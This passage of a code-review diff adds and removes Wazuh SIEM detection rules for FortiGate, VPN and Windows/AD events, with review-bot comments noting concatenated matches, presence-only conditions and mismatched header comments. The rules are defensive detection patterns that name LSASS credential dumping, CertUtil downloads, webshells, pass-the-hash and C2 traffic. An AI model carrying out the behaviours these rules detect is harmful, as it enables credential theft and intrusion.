-  <rule id="100332" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-02</match><description>A3-02 VPN Authentication Success from Multiple Country</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
50
-  <rule id="100333" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-03</match><description>A3-03 VPN Authentication Brute Force Success</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
51
-  <rule id="100334" level="5"><if_sid>100210</if_sid><match>usecase_id=A3-04</match><description>A3-04 VPN Authentication Multiple Fail Many Accounts from One Source</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
52
-  <rule id="100335" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-05</match><description>A3-05 VPN Authentication Success from Outside Thailand</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
53
-
54
-  <!-- Appendix A4 (Windows/AD) -->
55
-  <rule id="100341" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-01</match><description>A4-01 Windows Authentication Multiple Fail from Privileged Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
56
-  <rule id="100342" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-02</match><description>A4-02 Windows Authentication Multiple Fail from Service Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
57
-  <rule id="100343" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-03</match><description>A4-03 Windows AD Enumeration with Malicious Tools</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
58
-  <rule id="100344" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-04</match><description>A4-04 Windows Authentication Fail from Public IPs</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
59
-  <rule id="100345" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-05</match><description>A4-05 Windows File Share Enumeration to Single Destination</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
60
-  <rule id="100346" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-06</match><description>A4-06 Windows Authentication Success from Public IPs</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
61
-  <rule id="100347" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-07</match><description>A4-07 Windows Authentication Privileged Account Impersonation</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
62
-  <rule id="100348" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-08</match><description>A4-08 Windows Authentication Successful Pass the Hash RDP</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
63
-  <rule id="100349" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-09</match><description>A4-09 Windows Authentication Success from Guest Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
64
-  <rule id="100350" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-10</match><description>A4-10 Windows Authentication Interactive Logon Success by Service Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
65
-  <rule id="100351" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-11</match><description>A4-11 Windows Account Added to Privileged Custom Group</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
66
-  <rule id="100352" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-12</match><description>A4-12 Windows Account Added to Privileged Group</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
67
-  <rule id="100353" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-13</match><description>A4-13 Windows Domain Configure DSRM Password Reset</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
68
-  <rule id="100354" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-14</match><description>A4-14 Windows Authentication Multiple Fail One Account from Many Sources</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
69
-  <rule id="100355" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-15</match><description>A4-15 Windows Authentication Multiple Fail Many Accounts from One Source</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
70
-  <rule id="100356" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-16</match><description>A4-16 Windows Authentication Multiple Fail from Guest Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
71
-  <rule id="100357" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-17</match><description>A4-17 Windows Authentication Multiple Fail One Account from One Source</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
72
-  <rule id="100358" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-18</match><description>A4-18 Windows Authentication Multiple Interactive Logon Denied</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
73
-  <rule id="100359" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-19</match><description>A4-19 Windows Authentication Password Spray</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
74
-  <rule id="100360" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-20</match><description>A4-20 Windows Authentication Attempt from Disabled Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
75
-  <rule id="100361" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-21</match><description>A4-21 Windows Domain Account Created</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
76
-  <rule id="100362" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-22</match><description>A4-22 Windows Local Account Re Enabled</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
77
-  <rule id="100363" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-23</match><description>A4-23 Windows Local Account Created</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
78
-  <rule id="100364" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-24</match><description>A4-24 Windows Domain Account Re Enabled</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
79
-
80
-  <!-- Appendix B1 (VMware vCenter/ESXi) -->
81
-  <rule id="100401" level="12"><if_sid>100220</if_sid><match>usecase_id=B1-01</match><description>B1-01 vCenter GUI Login Failed 5 Times and Success 1 Time</description><group>soc_mvp_test,appendix_b,b1,vmware,</group></rule>
82
-  <rule id="100402" level="8"><if_sid>100220</if_sid><match>usecase_id=B1-02</match><description>B1-02 ESXi Enable SSH on Hosts</description><group>soc_mvp_test,appendix_b,b1,vmware,</group></rule>
83
-  <rule id="100403" level="12"><if_sid>100220</if_sid><match>usecase_id=B1-03</match><description>B1-03 ESXi SSH Failed 5 Times and Success 1 Time</description><group>soc_mvp_test,appendix_b,b1,vmware,</group></rule>
84
-
85
-  <!-- Appendix B2 (Log monitoring) -->
86
-  <rule id="100411" level="5"><if_sid>100220</if_sid><match>usecase_id=B2-01</match><description>B2-01 Log Monitor Logs Loss Detection</description><group>soc_mvp_test,appendix_b,b2,logmonitor,</group></rule>
87
-
88
-  <!-- Appendix B3 (Windows Sysmon) -->
89
-  <rule id="100421" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-01</match><description>B3-01 Sysmon LSASS Dumping</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
90
-  <rule id="100422" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-02</match><description>B3-02 Sysmon SQL Injection</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
91
-  <rule id="100423" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-03</match><description>B3-03 Sysmon Webshell</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
92
-  <rule id="100424" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-04</match><description>B3-04 Sysmon Uninstall</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
93
-  <rule id="100425" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-05</match><description>B3-05 Sysmon LSASS Dumping by Task Manager</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
94
-  <rule id="100426" level="8"><if_sid>100220</if_sid><match>usecase_id=B3-06</match><description>B3-06 Sysmon CertUtil Download</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
95
-
96
-  <!-- Appendix C1 (Impossible travel) -->
97
-  <rule id="100501" level="12"><if_sid>100230</if_sid><match>usecase_id=C1-01</match><description>C1-01 Impossible Travel Detection</description><group>soc_mvp_test,appendix_c,c1,identity,</group></rule>
98
-
99
-  <!-- Appendix C2 (Credential abuse & privilege misuse) -->
100
-  <rule id="100511" level="12"><if_sid>100230</if_sid><match>usecase_id=C2-01</match><description>C2-01 Privileged Account Usage Outside Business Hours</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
101
-  <rule id="100512" level="8"><if_sid>100230</if_sid><match>usecase_id=C2-02</match><description>C2-02 Dormant Account Activation</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
102
-  <rule id="100513" level="12"><if_sid>100230</if_sid><match>usecase_id=C2-03</match><description>C2-03 Service Account Interactive Logon</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
103
-  <rule id="100514" level="12"><if_sid>100230</if_sid><match>usecase_id=C2-04</match><description>C2-04 Rapid Privilege Escalation Followed by Sensitive Access</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
104
-
105
-  <!-- Appendix C3 (Lateral movement & internal recon) -->
106
-  <rule id="100521" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-01</match><description>C3-01 Multiple Authentication Success Across Hosts</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
107
-  <rule id="100522" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-02</match><description>C3-02 SMB/RDP Lateral Burst Pattern</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
108
-  <rule id="100523" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-03</match><description>C3-03 Admin Account Accessing Many Servers Rapidly</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
109
-  <rule id="100524" level="8"><if_sid>100230</if_sid><match>usecase_id=C3-04</match><description>C3-04 Internal Scanning / Enumeration Behavior</description><group>soc_mvp_test,appendix_c,c3,recon,</group></rule>
110
-  <!-- ========================= -->
111
-  <!-- Production profile rules -->
112
-  <!-- ========================= -->
113
-  <!--
114
-    Production profile (second profile):
115
-    - Does not depend on simulation marker fields (soc_mvp_test/usecase_id)
116
-    - Uses source-like patterns that can appear in real logs
117
-    - Rule IDs are separated from simulation profile in 110xxx range
118
-  -->
119
-
120
-  <rule id="110200" level="3">
121
-    <description>SOC MVP production profile enabled</description>
122
-    <group>soc_mvp_prod,baseline,</group>
123
-  </rule>
124
-
125
-  <!-- Appendix A1: DNS / Firewall IOC -->
126
-  <rule id="110301" level="8">
127
-    <decoded_as>soc-dns-ioc</decoded_as>
128
-    <match>event_type=ioc_dns_traffic</match>
129
-    <match>malicious.example</match>
130
-    <description>A1 production: DNS query to malicious domain indicator</description>
131
-    <group>soc_mvp_prod,appendix_a,a1,ioc,dns,</group>
132
-  </rule>
133
-  <rule id="110302" level="8">
134
-    <decoded_as>soc-dns-ioc</decoded_as>
135
-    <match>event_type=ioc_domain_match</match>
136
-    <description>A1 production: DNS IOC domain match event</description>
137
-    <group>soc_mvp_prod,appendix_a,a1,ioc,dns,</group>
138
-  </rule>
139
-
140
-  <!-- Appendix A2: FortiGate IPS/IDS & Firewall -->
141
-  <rule id="110311" level="12">
142
-    <match>vendor=fortinet</match>
143
-    <match>dstport=3389</match>
144
-    <match>action="accept"</match>
145
-    <description>A2 production: FortiGate allowed RDP traffic detected</description>
146
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
147
-  </rule>
148
-  <rule id="110312" level="12">
149
-    <match>vendor=fortinet</match>
150
-    <match>action="password-change"</match>
151
-    <description>A2 production: FortiGate admin password change</description>
152
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
153
-  </rule>
154
-  <rule id="110313" level="12">
155
-    <match>vendor=fortinet</match>
156
-    <match>action="create-admin"</match>
157
-    <description>A2 production: FortiGate admin account creation</description>
158
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
159
-  </rule>
160
-  <rule id="110314" level="12">
161
-    <match>vendor=fortinet</match>
162
-    <match>action="disable-email-notification"</match>
163
-    <description>A2 production: FortiGate email notification disabled</description>
164
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
165
-  </rule>
166
-  <rule id="110315" level="5">
167
-    <match>vendor=fortinet</match>
168
-    <match>action="download-config"</match>
169
-    <description>A2 production: FortiGate configuration download</description>
170
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
171
-  </rule>
172
-  <rule id="110316" level="8">
173
-    <match>vendor=fortinet</match>
174
-    <match>subtype="ips"</match>
175
-    <match>severity="critical"</match>
176
-    <description>A2 production: FortiGate critical IPS alert</description>
177
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,ips,</group>
178
-  </rule>
179
-  <rule id="110317" level="5">
180
-    <match>vendor=fortinet</match>
181
-    <match>event_type=port_scan</match>
182
-    <description>A2 production: FortiGate port scanning indicator</description>
183
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,recon,</group>
184
-  </rule>
185
-  <rule id="110318" level="8">
186
-    <match>vendor=fortinet</match>
187
-    <match>event_type=ioc_detection</match>
188
-    <description>A2 production: FortiGate IOC detection event</description>
189
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,ioc,</group>
190
-  </rule>
191
-  <rule id="110320" level="8">
192
-    <match>vendor=fortinet</match>
193
-    <match>event_type=malicious_ip_communication</match>
194
-    <description>A2 production: Communication to malicious IP detected</description>
195
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,ioc,</group>
196
-  </rule>
197
-
198
-  <!-- Appendix A3: FortiGate VPN -->
199
-  <rule id="110331" level="12">
200
-    <match>subtype="vpn"</match>
201
-    <match>success=true</match>
202
-    <match>guest</match>
203
-    <description>A3 production: VPN success by guest account</description>
204
-    <group>soc_mvp_prod,appendix_a,a3,vpn,</group>
205
-  </rule>
206
-  <rule id="110333" level="12">
207
-    <match>subtype="vpn"</match>
208
-    <match>event_type=vpn_bruteforce_success</match>
209
-    <description>A3 production: VPN brute-force success indicator</description>
210
-    <group>soc_mvp_prod,appendix_a,a3,vpn,</group>
211
-  </rule>
212
-  <rule id="110335" level="12">
213
-    <match>subtype="vpn"</match>
214
-    <match>success=true</match>
215
-    <match>country=</match>
216
-    <description>A3 production: VPN success with country context (geo-anomaly candidate)</description>
217
-    <group>soc_mvp_prod,appendix_a,a3,vpn,geo,</group>
218
-  </rule>
219
-
220
-  <!-- Appendix A4: Windows / Active Directory -->
221
-  <rule id="110341" level="8">
222
-    <match>source=windows</match>
223
-    <match>event_id=4625</match>
224
-    <match>is_admin=true</match>
225
-    <description>A4 production: Privileged account authentication failures</description>
226
-    <group>soc_mvp_prod,appendix_a,a4,windows,auth_fail,</group>
227
-  </rule>
228
-  <rule id="110342" level="8">
229
-    <match>source=windows</match>
230
-    <match>event_id=4625</match>
231
-    <match>is_service=true</match>
232
-    <description>A4 production: Service account authentication failures</description>
233
-    <group>soc_mvp_prod,appendix_a,a4,windows,auth_fail,</group>
234
-  </rule>
235
-  <rule id="110346" level="12">
236
-    <match>source=windows</match>
237
-    <match>event_id=4624</match>
238
-    <match>src_ip=</match>
239
-    <description>A4 production: Windows successful authentication with source IP context</description>
240
-    <group>soc_mvp_prod,appendix_a,a4,windows,auth_success,</group>
241
-  </rule>
242
-  <rule id="110352" level="12">
243
-    <match>source=windows</match>
244
-    <match>event_id=4728</match>
245
-    <match>target_group=</match>
246
-    <description>A4 production: Account added to privileged group (domain scope)</description>
247
-    <group>soc_mvp_prod,appendix_a,a4,windows,privilege,</group>
248
-  </rule>
249
-  <rule id="110353" level="12">
250
-    <match>source=windows</match>
251
-    <match>event_id=4732</match>
252
-    <match>target_group=</match>
253
-    <description>A4 production: Account added to privileged group (local scope)</description>
254
-    <group>soc_mvp_prod,appendix_a,a4,windows,privilege,</group>
255
-  </rule>
256
-
257
-  <!-- Appendix B1: VMware -->
258
-  <rule id="110401" level="12">
259
-    <decoded_as>soc-vmware-auth</decoded_as>
260
-    <match>event_type=vmware_</match>
261
-    <match>_fail_success</match>
262
-    <description>B1 production: vCenter login burst pattern</description>
263
-    <group>soc_mvp_prod,appendix_b,b1,vmware,</group>
264
-  </rule>
265
-  <rule id="110402" level="8">
266
-    <decoded_as>soc-vmware-auth</decoded_as>
267
-    <match>event_type=vmware_esxi_enable_ssh</match>
268
-    <description>B1 production: ESXi SSH enabled</description>
269
-    <group>soc_mvp_prod,appendix_b,b1,vmware,</group>
270
-  </rule>
271
-
272
-  <!-- Appendix B2: Log monitoring -->
273
-  <rule id="110411" level="5">
274
-    <decoded_as>soc-log-monitor</decoded_as>
275
-    <match>event_type=log_loss_detection</match>
276
-    <match>missing_stream=</match>
277
-    <description>B2 production: Log loss detection signal</description>
278
-    <group>soc_mvp_prod,appendix_b,b2,logmonitor,</group>
279
-  </rule>
280
-
281
-  <!-- Appendix B3: Sysmon -->
282
-  <rule id="110421" level="12">
283
-    <decoded_as>soc-windows-sysmon</decoded_as>
284
-    <match>target_process=lsass.exe</match>
285
-    <description>B3 production: LSASS dump behavior</description>
286
-    <group>soc_mvp_prod,appendix_b,b3,sysmon,credential_access,</group>
287
-  </rule>
288
-  <rule id="110426" level="8">
289
-    <decoded_as>soc-windows-sysmon</decoded_as>
290
-    <match>process=certutil.exe</match>
291
-    <description>B3 production: CertUtil download pattern</description>
292
-    <group>soc_mvp_prod,appendix_b,b3,sysmon,</group>
293
-  </rule>
294
-
295
-  <!-- Appendix C1-C3: future enhancement (production-prep heuristics) -->
296
-  <rule id="110501" level="12">
297
-    <match>event_type=c1_impossible_travel</match>
298
-    <description>C1 production: Impossible travel correlated event</description>
299
-    <group>soc_mvp_prod,appendix_c,c1,identity,</group>
300
-  </rule>
301
-  <rule id="110511" level="12">
302
-    <match>event_type=c2_credential_abuse</match>
303
-    <description>C2 production: Credential abuse correlated event</description>
304
-    <group>soc_mvp_prod,appendix_c,c2,identity,</group>
305
-  </rule>
306
-  <rule id="110521" level="12">
307
-    <match>event_type=c3_lateral_movement</match>
308
-    <description>C3 production: Lateral movement correlated event</description>
309
-    <group>soc_mvp_prod,appendix_c,c3,lateral_movement,</group>
310
-  </rule>
311 21
 </group>
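Review bot: Rules 100250 and 100260 are described as anchors but are set to `level="3"`, so every event the two decoders claim is itself recorded as an alert wherever the alert threshold is 3 or lower; if they exist only as `<if_sid>` parents, level 0 is the usual choice. The hunk also deletes the production rules from 110331 through 110521, several of which relied on `<decoded_as>` for `soc-vmware-auth`, `soc-log-monitor` and `soc-windows-sysmon`, decoders that local_decoder.xml drops in this same commit; please confirm each of those detections is re-created in a per-appendix file with a parent that still exists.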

+ 47 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a1-ioc-rules.xml

@@ -0,0 +1,47 @@
1
+<!--
2
+  SOC Proposal Rules — Appendix A1: DNS / Firewall IOC
3
+  Simulation profile rule IDs : 100301-100302
4
+  Production profile rule IDs : 110301-110302
5
+
6
+  Severity mapping:
7
+    Medium → level 8
8
+
9
+  Decoded fields used (soc-mvp-dns):
10
+    status     = event_type  (ioc_dns_traffic | ioc_domain_match)
11
+    srcip      = source IP
12
+    url        = queried domain
13
+    action     = blocked | alert
14
+-->
15
+<group name="soc_mvp,appendix_a,a1,ioc,dns,">
16
+
17
+  <!-- ── Simulation profile (usecase_id markers present) ── -->
18
+
19
+
20
+
21
+  <!-- ── Production profile (field-based matching) ── -->
22
+
23
+  <rule id="110301" level="8">
24
+    <if_sid>100250</if_sid>
25
+    <match>event_type=ioc_dns_traffic</match>
26
+    <description>A1-01 [PROD] DNS query to malicious domain (IOC traffic indicator)</description>
27
+    <group>soc_prod,a1,ioc,</group>
28
+    <mitre>
29
+      <id>T1071.004</id>
30
+    </mitre>
31
+  </rule>
32
+
33
+  <rule id="110302" level="8">
34
+    <if_sid>100250</if_sid>
35
+    <match>event_type=ioc_domain_match</match>
36
+    <description>A1-02 [PROD] DNS IOC domain match from threat intelligence feed</description>
37
+    <group>soc_prod,a1,ioc,</group>
38
+    <mitre>
39
+      <id>T1568</id>
40
+    </mitre>
41
+  </rule>
42
+
43
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
44
+
45
+
46
+
47
+</group>
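Review bot: The header comment does not match the code in this commit: it names the decoder `soc-mvp-dns` and lists `url` and `action` as decoded fields, while the decoder added in local_decoder.xml is `soc-prod-dns` with `<order>status, srcip</order>` only. It also advertises simulation rule IDs 100301-100302, but the simulation section and the "normalized key=value" section below are empty. Please correct the comment and drop the empty placeholders, and since `event_type` is already decoded into `status`, consider matching 110301 and 110302 on that decoded field rather than on `<match>event_type=...</match>` against the raw line.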

+ 113 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a2-fortigate-fw-rules.xml

@@ -0,0 +1,113 @@
1
+<!--
2
+  SOC Proposal Rules — Appendix A2: FortiGate IPS/IDS & Firewall
3
+  Simulation profile rule IDs : 100311-100320
4
+  Production profile rule IDs : 110311-110320
5
+
6
+  Severity mapping:
7
+    High   → level 12
8
+    Medium → level 8
9
+    Low    → level 5
10
+-->
11
+<group name="soc_mvp,appendix_a,a2,fortigate,">
12
+
13
+  <!-- ── Simulation profile ── -->
14
+
15
+
16
+
17
+
18
+
19
+
20
+
21
+
22
+
23
+
24
+
25
+  <!-- ── Production profile (if_group=fortigate, no soc_mvp_test required) ── -->
26
+
27
+  <rule id="110311" level="12">
28
+    <if_group>fortigate</if_group>
29
+    <match>dstport=3389</match>
30
+    <match>action="accept"</match>
31
+    <description>A2-01 [PROD] FortiGate: RDP (3389) traffic allowed</description>
32
+    <group>soc_prod,a2,rdp,</group>
33
+    <mitre><id>T1021.001</id></mitre>
34
+  </rule>
35
+
36
+  <rule id="110312" level="12">
37
+    <if_group>fortigate</if_group>
38
+    <match>action="password-change"</match>
39
+    <description>A2-02 [PROD] FortiGate: admin account password changed</description>
40
+    <group>soc_prod,a2,admin_change,</group>
41
+    <mitre><id>T1098</id></mitre>
42
+  </rule>
43
+
44
+  <rule id="110313" level="12">
45
+    <if_group>fortigate</if_group>
46
+    <match>action="create-admin"</match>
47
+    <description>A2-03 [PROD] FortiGate: new admin account created</description>
48
+    <group>soc_prod,a2,admin_change,</group>
49
+    <mitre><id>T1136</id></mitre>
50
+  </rule>
51
+
52
+  <rule id="110314" level="12">
53
+    <if_group>fortigate</if_group>
54
+    <match>action="config-change"</match>
55
+    <match>config_value=disable</match>
56
+    <description>A2-04 [PROD] FortiGate: alerting/notification disabled via config change</description>
57
+    <group>soc_prod,a2,defense_evasion,</group>
58
+    <mitre><id>T1562</id></mitre>
59
+  </rule>
60
+
61
+  <rule id="110315" level="5">
62
+    <if_group>fortigate</if_group>
63
+    <match>action="download-config"</match>
64
+    <description>A2-05 [PROD] FortiGate: firewall configuration file downloaded</description>
65
+    <group>soc_prod,a2,config,</group>
66
+    <mitre><id>T1005</id></mitre>
67
+  </rule>
68
+
69
+  <rule id="110316" level="8">
70
+    <if_group>fortigate</if_group>
71
+    <match>subtype="ips"</match>
72
+    <match>attack="Multiple.Critical</match>
73
+    <description>A2-06 [PROD] FortiGate IPS: multiple critical signatures triggered</description>
74
+    <group>soc_prod,a2,ips,</group>
75
+    <mitre><id>T1595</id></mitre>
76
+  </rule>
77
+
78
+  <rule id="110317" level="5">
79
+    <if_group>fortigate</if_group>
80
+    <match>subtype="anomaly"</match>
81
+    <match>attack="TCP.Port.Scan"</match>
82
+    <description>A2-07 [PROD] FortiGate: TCP port scan from external IP</description>
83
+    <group>soc_prod,a2,recon,</group>
84
+    <mitre><id>T1046</id></mitre>
85
+  </rule>
86
+
87
+  <rule id="110318" level="8">
88
+    <if_group>fortigate</if_group>
89
+    <match>subtype="ips"</match>
90
+    <match>ioc_type=ip</match>
91
+    <description>A2-08 [PROD] FortiGate IPS: IOC-based IP indicator detected</description>
92
+    <group>soc_prod,a2,ioc,</group>
93
+    <mitre><id>T1071.001</id></mitre>
94
+  </rule>
95
+
96
+  <rule id="110319" level="8">
97
+    <if_group>fortigate</if_group>
98
+    <match>subtype="anomaly"</match>
99
+    <match>attack="Internal.Port.Scan"</match>
100
+    <description>A2-09 [PROD] FortiGate: internal port scan from private source IP</description>
101
+    <group>soc_prod,a2,recon,</group>
102
+    <mitre><id>T1046</id></mitre>
103
+  </rule>
104
+
105
+  <rule id="110320" level="8">
106
+    <if_group>fortigate</if_group>
107
+    <match>threat_label="known-c2"</match>
108
+    <description>A2-10 [PROD] FortiGate: traffic to known C2/malicious IP allowed</description>
109
+    <group>soc_prod,a2,ioc,c2,</group>
110
+    <mitre><id>T1071.001</id></mitre>
111
+  </rule>
112
+
113
+</group>
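Review bot: The paired `<match>` elements in 110311, 110314, 110316, 110317, 110318 and 110319 will not behave as an AND. Per the Wazuh ruleset syntax, repeated `<match>` labels in one rule are concatenated into a single pattern, so 110311 ends up searching for the literal `dstport=3389action="accept"`, which no FortiGate line contains. Keep one `<match>` and express the second condition with a different element (a `<regex>` or a decoded `<field>`), or chain a child rule with `<if_sid>`. Separately, 110316 has `attack="Multiple.Critical` with no closing quote while every other match in the file closes its quote; if a prefix match is intended, say so in a comment. `dstport=3389` is also a plain substring and will hit `dstport=33890`.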

+ 66 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a3-fortigate-vpn-rules.xml

@@ -0,0 +1,66 @@
1
+<!--
2
+  SOC Proposal Rules — Appendix A3: FortiGate VPN
3
+  Simulation profile rule IDs : 100331-100335
4
+  Production profile rule IDs : 110331-110335
5
+
6
+  Severity mapping:
7
+    High → level 12
8
+    Low  → level 5
9
+-->
10
+<group name="soc_mvp,appendix_a,a3,vpn,fortigate,">
11
+
12
+  <!-- ── Simulation profile ── -->
13
+
14
+
15
+
16
+
17
+
18
+
19
+  <!-- ── Production profile (if_group=fortigate) ── -->
20
+
21
+  <rule id="110331" level="12">
22
+    <if_group>fortigate</if_group>
23
+    <match>action="ssl-login-success"</match>
24
+    <match>user="guest"</match>
25
+    <description>A3-01 [PROD] VPN authentication success by guest account</description>
26
+    <group>soc_prod,a3,vpn_guest,</group>
27
+    <mitre><id>T1078.001</id></mitre>
28
+  </rule>
29
+
30
+  <rule id="110332" level="12">
31
+    <if_group>fortigate</if_group>
32
+    <match>action="ssl-login-success"</match>
33
+    <match>previous_country=</match>
34
+    <description>A3-02 [PROD] VPN success from different country than last login</description>
35
+    <group>soc_prod,a3,vpn_geo,</group>
36
+    <mitre><id>T1078</id></mitre>
37
+  </rule>
38
+
39
+  <rule id="110333" level="12">
40
+    <if_group>fortigate</if_group>
41
+    <match>action="ssl-login-success"</match>
42
+    <match>failed_attempts_before_success=</match>
43
+    <description>A3-03 [PROD] VPN success after multiple prior failures (brute-force indicator)</description>
44
+    <group>soc_prod,a3,vpn_bruteforce,</group>
45
+    <mitre><id>T1110.001</id></mitre>
46
+  </rule>
47
+
48
+  <rule id="110334" level="5">
49
+    <if_group>fortigate</if_group>
50
+    <match>action="ssl-login-fail"</match>
51
+    <match>failed_accounts=</match>
52
+    <description>A3-04 [PROD] VPN multiple account failures from single source IP</description>
53
+    <group>soc_prod,a3,vpn_bruteforce,</group>
54
+    <mitre><id>T1110.003</id></mitre>
55
+  </rule>
56
+
57
+  <rule id="110335" level="12">
58
+    <if_group>fortigate</if_group>
59
+    <match>action="ssl-login-success"</match>
60
+    <match>expected_country=TH</match>
61
+    <description>A3-05 [PROD] VPN authentication success from outside Thailand</description>
62
+    <group>soc_prod,a3,vpn_geo,</group>
63
+    <mitre><id>T1078</id></mitre>
64
+  </rule>
65
+
66
+</group>
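Review bot: The second `<match>` in 110332, 110333, 110334 and 110335 only tests that a key is present, not the condition the description states. `previous_country=` matches any login that carries the field, `failed_attempts_before_success=` and `failed_accounts=` match a value of 0, and `expected_country=TH` in 110335 matches logins whose expected country is Thailand rather than logins whose source country differs from it. Compare the actual country against the expected one (or have the upstream enrichment emit an explicit mismatch flag) and put a numeric threshold on the counters. Every rule in this file also stacks two `<match>` elements, which Wazuh concatenates into one pattern instead of AND-ing; move one of the two conditions into a `<regex>` or `<field>`.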

+ 168 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a4-windows-ad-rules.xml

@@ -0,0 +1,168 @@
1
+<!--
2
+  SOC Proposal Rules — Appendix A4: Windows / Active Directory
3
+  Simulation profile rule IDs : 100341-100364
4
+  Production profile rule IDs : 110341-110364
5
+
6
+  Production rules use specific built-in Wazuh rule SIDs as parents
7
+  to avoid the N×M rule-tree explosion from if_group=windows:
8
+    60105/60122 → event 4625 (auth failure)
9
+    60106       → event 4624 (auth success / logon)
10
+    60109       → events 4720/4722 (account create/enable)
11
+    60113       → events 4728/4732 (group membership change)
12
+    67027       → event 4688 (new process created)
13
+    60103       → event 4794 (DSRM password set)
14
+-->
15
+<group name="soc_mvp,appendix_a,a4,windows,">
16
+
17
+  <!-- ── Simulation profile ── -->
18
+
19
+
20
+
21
+
22
+
23
+
24
+
25
+
26
+
27
+
28
+
29
+
30
+
31
+
32
+
33
+
34
+
35
+
36
+
37
+
38
+
39
+
40
+
41
+
42
+
43
+  <!-- ── Production profile ──
44
+       Parents are specific built-in Wazuh SIDs (not if_group=windows) to
45
+       avoid N×M rule-tree explosion. Each parent fires for one event ID.
46
+  -->
47
+
48
+  <!-- A4-01/02/19: Auth failures (event 4625)
49
+       Parent: 60105 (4625 base), 60122 (4625 variant) -->
50
+  <rule id="110341" level="8">
51
+    <if_sid>60105, 60122</if_sid>
52
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)admin</field>
53
+    <description>A4-01 [PROD] Windows: privileged account name auth failure (4625)</description>
54
+    <group>soc_prod,a4,auth_fail,</group>
55
+    <mitre><id>T1110.001</id></mitre>
56
+  </rule>
57
+
58
